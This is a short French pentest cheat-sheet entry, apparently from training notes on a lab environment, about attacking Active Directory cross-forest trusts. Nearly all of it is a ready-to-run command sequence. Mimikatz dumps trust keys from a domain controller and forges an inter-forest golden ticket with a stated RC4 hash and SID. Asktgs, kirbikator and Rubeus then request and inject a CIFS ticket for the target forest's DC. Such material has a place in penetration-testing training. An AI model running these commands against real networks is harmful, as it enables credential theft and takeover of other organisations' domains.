Across Forest
Même methodologie que pour abuser des cross domain trust :
On demande la Trust Key :
Invoke-Mimikatz -Command '"lsadump::trust /patch"' # A faire depuis le DC
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Creation d'un TGT inter-Forest :
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:0fd0741334bd0ef966f87094f10cc522 /service:krbtgt /target:eurocorp.local /ticket:trust_forest_tkt.kirbi"'
Demande d'un TGS pour un service ciblé dans la Forest :
.\\asktgs.exe trust_forest_tkt.kirbi CIFS/eurocorp-dc.eurocorp.local
On load ensuite les TGS en mémoire :
.\\kirbikator.exe lsa .\\CIFS.eurocorp-dc.eurocorp.local.kirbi
.\\Rubeus.exe asktgs /ticket:trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt
Dernière mise à jour 10mo ago